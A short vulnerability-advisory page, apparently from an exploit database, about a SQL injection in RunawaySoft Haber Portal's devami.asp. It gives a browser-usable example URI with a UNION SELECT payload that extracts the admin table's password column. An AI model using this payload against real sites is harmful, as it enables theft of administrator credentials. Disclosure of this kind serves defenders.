• info
• discussion
• exploit
• solution
• references

RunawaySoft Haber Portal Devami.asp SQL Injection Vulnerability

An attacker can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/rshaber/haber/devami.asp?id=1 union+select+all+0,sifre,2,3,4,5,6,7+from+admin